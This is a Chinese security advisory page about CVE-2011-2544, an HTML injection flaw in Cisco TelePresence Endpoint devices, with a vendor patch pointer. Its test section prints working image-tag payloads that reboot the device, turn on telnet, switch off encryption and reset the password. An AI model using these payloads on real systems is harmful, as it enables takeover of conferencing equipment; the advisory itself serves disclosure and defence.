Cisco TelePresence Endpoint HTML代码注入漏洞

发布日期：2011-09-19
更新日期：2011-09-19受影响系统：
Cisco Cisco TelePresence Endpoint MXP F9.1
Cisco Cisco TelePresence Endpoint C TC4.1.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 49670
CVE ID: CVE-2011-2544Cisco TelePresence Endpoint是个人桌面和家庭办公室提供的端点服务。Cisco TelePresence Endpoint在实现上存在HTML注入漏洞，远程攻击者可利用HTML注入漏洞在受影响浏览器中执行任意脚本代码，窃取cookie身份验证配置。此漏洞源于H.323 ID或SIP Display Name字段的灵活性以及无法正确验证用户输入。<*来源：David Klein

链接：http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！Rebooting the system:
<IMG SRC="/reboot&Yes=please">.
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:
<IMG SRC=/html_select_status？reload=other.ssi&telnet=On>
<IMG
SRC=/html_select_status？reload=security.ssi&/Configuration/Con
ference/Encryption/Mode=Off&/Configuration/SystemUnit/Password
=test>建议：
--------------------------------------------------------------------------------
厂商补丁：Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.cisco.com/warp/public/707/advisory.htmlOpera Mobile for Android不安全文件权限缓存中毒漏洞FFmpeg “svq3_get_se_golomb（）”多个安全漏洞相关资讯漏洞 Cisco cisco漏洞

Cisco Unified Communications （10/12/2015 15:11:19）
《Cisco网络技术》课程实验指导书- （08/03/2015 21:05:31）
快递官网漏洞泄露 1400 万用户信息（08/12/2014 08:37:42）

Cisco 正为苹果设备优化其网络表现（09/01/2015 12:24:06）
Cisco Transport Gateway for （08/30/2014 07:07:12）
Cisco Prime Data Center Network （07/30/2014 20:59:06）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容